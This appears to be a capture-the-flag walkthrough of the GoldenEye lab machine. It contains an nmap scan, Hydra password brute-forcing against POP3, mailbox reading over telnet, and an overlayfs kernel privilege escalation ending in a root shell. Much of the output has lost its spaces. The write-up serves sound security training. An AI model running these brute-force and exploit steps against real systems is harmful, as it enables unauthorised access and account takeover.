$nmap-sC-sV-p-10.10.251.158-oNnmap.outStartingNmap7.91 ( https://nmap.org ) at 2021-06-26 13:25 ISTHostisup (0.15s latency).Notshown:65531closedportsPORTSTATESERVICEVERSION25/tcpopensmtpPostfixsmtpd|_smtp-commands:ubuntu,PIPELINING,SIZE10240000,VRFY,ETRN,STARTTLS,ENHANCEDSTATUSCODES,8BITMIME,DSN,|_ssl-date:TLSrandomnessdoesnotrepresenttime80/tcpopenhttpApachehttpd2.4.7 ((Ubuntu))|_http-server-header:Apache/2.4.7 (Ubuntu)|_http-title:GoldenEyePrimaryAdminServer55006/tcpopenssl/unknown|ssl-cert:Subject:commonName=localhost/organizationName=Dovecotmailserver|Notvalidbefore:2018-04-24T03:23:52|_Notvalidafter:2028-04-23T03:23:52|_ssl-date:TLSrandomnessdoesnotrepresenttime55007/tcpopenpop3Dovecotpop3d|_pop3-capabilities:TOPUIDLAUTH-RESP-CODEUSERPIPELININGSTLSRESP-CODESSASL(PLAIN) CAPA|_ssl-date:TLSrandomnessdoesnotrepresenttimeServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress (1 hostup) scanned in 591.22 seconds
Take a look on the website, take a dive into the source code too and remember to inspect all scripts!
Who needs to make sure they update their default password?
Answer: Boris
Steps to Reproduce: In terminal.js:
//Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic....////I encoded you p@ssword below...////InvincibleHack3r////BTW Natalya says she can break your codes//
What's their password?
Answer: InvincibleHack3r
Steps to Reproduce:
- In cyberchef, use From HTML Entity:
InvincibleHack3r
InvincibleHack3r
Now go use those credentials and login to a part of the site.
It's Mail Time
Take a look at some of the other services you found using your nmap scan. Are the credentials you have re-usable?
If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra? What's their new password?
Brute force the password of Boris:
$hydra-lBoris-P/usr/share/wordlists/rockyou.txt-s55007-f10.10.251.158pop3-VHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-26 13:54:07[..snip..][55007][pop3] host: 10.10.251.158 login: Boris password: REDACTED[STATUS] attack finished for 10.10.251.158 (validpairfound)1of1targetsuccessfullycompleted,1validpasswordfound
Brute force the password of Natalya:
$hydra-lNatalya-P/usr/share/wordlists/fasttrack.txt-s55007-f10.10.251.158pop3-VHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-26 14:15:59[..snip..][55007][pop3] host: 10.10.251.158 login: Natalya password: REDACTED[STATUS] attack finished for 10.10.251.158 (validpairfound)1of1targetsuccessfullycompleted,1validpasswordfound
Inspect port 55007, what services is configured to use this port?
Answer: telnet
Steps to Reproduce: We can connect to this port using telnet
What can you find on this service?
Answer: emails
Steps to Reproduce:
Using Natalya's credentials:
$telnet10.10.251.15855007Trying10.10.251.158...Connectedto10.10.251.158.Escapecharacteris'^]'.+OKGoldenEyePOP3Electronic-MailSystemUSERNatalya+OKPASSREDACTED+OKLoggedin.-ERRUnknowncommand:STAT+OK21679LIST+OK2messages:163121048.RETR1+OK631octetsReturn-Path:<root@ubuntu>X-Original-To:natalyaDelivered-To:natalya@ubuntuReceived:fromok (localhost [127.0.0.1])byubuntu (Postfix) with ESMTP id D5EDA454B1for<natalya>; Tue,10Apr199519:45:33-0700 (PDT)Message-Id:<20180425024542.D5EDA454B1@ubuntu>Date:Tue,10Apr199519:45:33-0700 (PDT)From:root@ubuntuNatalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.RETR2+OK1048octetsReturn-Path:<root@ubuntu>X-Original-To:natalyaDelivered-To:natalya@ubuntuReceived:fromroot (localhost [127.0.0.1])byubuntu (Postfix) with SMTP id 17C96454B1for<natalya>; Tue,29Apr199520:19:42-0700 (PDT)Message-Id:<20180425031956.17C96454B1@ubuntu>Date:Tue,29Apr199520:19:42-0700 (PDT)From:root@ubuntuOk Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok,usercredsare:username:xeniapassword:REDACTEDBorisverifiedherasavalidcontractorsojustcreatetheaccountok?Andifyoudidn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir**Make sure to edit your host file since you usually work remote off-network....Since you'reaLinuxuserjustpointthisserversIPtosevernaya-station.comin/etc/hosts.
Using Boris' credentials:
$telnet10.10.251.15855007Trying10.10.251.158...Connectedto10.10.251.158.Escapecharacteris'^]'.+OKGoldenEyePOP3Electronic-MailSystemUSERBoris+OKPASSREDACTED+OKLoggedin.LIST+OK3messages:154423733921.RETR1+OK544octetsReturn-Path:<root@127.0.0.1.goldeneye>X-Original-To:borisDelivered-To:boris@ubuntuReceived:fromok (localhost [127.0.0.1])byubuntu (Postfix) with SMTP id D9E47454B1for<boris>; Tue,2Apr199019:22:14-0700 (PDT)Message-Id:<20180425022326.D9E47454B1@ubuntu>Date:Tue,2Apr199019:22:14-0700 (PDT)From:root@127.0.0.1.goldeneyeBoris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.RETR2+OK373octetsReturn-Path:<natalya@ubuntu>X-Original-To:borisDelivered-To:boris@ubuntuReceived:fromok (localhost [127.0.0.1])byubuntu (Postfix) with ESMTP id C3F2B454B1for<boris>; Tue,21Apr199519:42:35-0700 (PDT)Message-Id:<20180425024249.C3F2B454B1@ubuntu>Date:Tue,21Apr199519:42:35-0700 (PDT)From:natalya@ubuntuBoris,Icanbreakyourcodes!.RETR3+OK921octetsReturn-Path:<alec@janus.boss>X-Original-To:borisDelivered-To:boris@ubuntuReceived:fromjanus (localhost [127.0.0.1])byubuntu (Postfix) with ESMTP id 4B9F4454B1for<boris>; Wed,22Apr199519:51:48-0700 (PDT)Message-Id:<20180425025235.4B9F4454B1@ubuntu>Date:Wed,22Apr199519:51:48-0700 (PDT)From:alec@janus.bossBoris,Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS-Keepsecuritytightorwewillbecompromised.
What user can break Boris' codes?
Answer: Natalya
Using the users you found on this service, find other users passwords
username: xenia
password: REDACTED
Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.
Too long and boring!!
GoldenEye Operators Training
Try using the credentials you found earlier. Which user can you login as?
Answer: xenia
Have a poke around the site. What other user can you find?
Answer: Doak
What was this users password?
Using Hydra over pop3:
$ hydra -l Doak -P /usr/share/wordlists/fasttrack.txt -s 55007 -f 10.10.251.158 pop3 -VHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-26 14:42:49[..snip..][55007][pop3] host: 10.10.251.158 login: Doak password: REDACTED[STATUS] attack finished for 10.10.251.158 (validpairfound)1of1targetsuccessfullycompleted,1validpasswordfoundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-26 14:45:51
Use this users credentials to go through all the services you have found to reveal more emails.
We can find doak's username and password
$telnet10.10.251.15855007Trying10.10.251.158...Connectedto10.10.251.158.Escapecharacteris'^]'.+OKGoldenEyePOP3Electronic-MailSystemUSERDoak+OKPASSREDACTED+OKLoggedin.-ERRUnknowncommand:LIST+OK1messages:1606.RETR1+OK606octetsReturn-Path:<doak@ubuntu>X-Original-To:doakDelivered-To:doak@ubuntuReceived:fromdoak (localhost [127.0.0.1])byubuntu (Postfix) with SMTP id 97DC24549Dfor<doak>; Tue,30Apr199520:47:24-0700 (PDT)Message-Id:<20180425034731.97DC24549D@ubuntu>Date:Tue,30Apr199520:47:24-0700 (PDT)From:doak@ubuntuJames,Ifyou're reading this, congrats you'vegottenthisfar.Youknowhowtradecraftworksright?Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username:dr_doakpassword:REDACTED.
What is the next user you can find from doak?
Answer: dr_doak
What is this users password?
username:dr_doakpassword:REDACTED
Take a look at their files on the moodle (severnaya-station.com)
There is a file name s3cret.txt - for James
Download the attachments and see if there are any hidden messages inside them?
This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:
Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.
Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.
Overlayfs mount would only be visible within user namespace, so let namespace process change CWD to overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.
Make su on overlayfs world writable without changing the owner
Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is your key! What development tools are installed on the machine?
By checking inside /usr/bin, we can find clang is installed. So, we can use that to compile the code!
Make sure to modify a line inside the exploit which contains gcc to clang: lib = system("clang -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
Transfer the exploit to the victim machine and compile it!
cc was also installed on the machine!! That was the hint - one letter change!
www-data@ubuntu:/dev/shm$./ofsspawningthreadsmount#1mount#2childthreadsdone/etc/ld.so.preloadcreatedcreatingsharedlibrary# whoamiroot# cd /root# ls -latotal44drwx------3rootroot4096Apr292018.drwxr-xr-x22rootroot4096Apr242018..-rw-r--r--1rootroot19May32018.bash_history-rw-r--r--1rootroot3106Feb192014.bashrcdrwx------2rootroot4096Apr282018.cache-rw-------1rootroot144Apr292018.flag.txt-rw-r--r--1rootroot140Feb192014.profile-rw-------1rootroot1024Apr232018.rnd-rw-------1rootroot8296Apr292018.viminfo# cat .flag.txtAlectoldmetoplacethecodeshere:REDACTEDIfyoucapturedthismakesuretogohere...../006-final/xvf7-flag/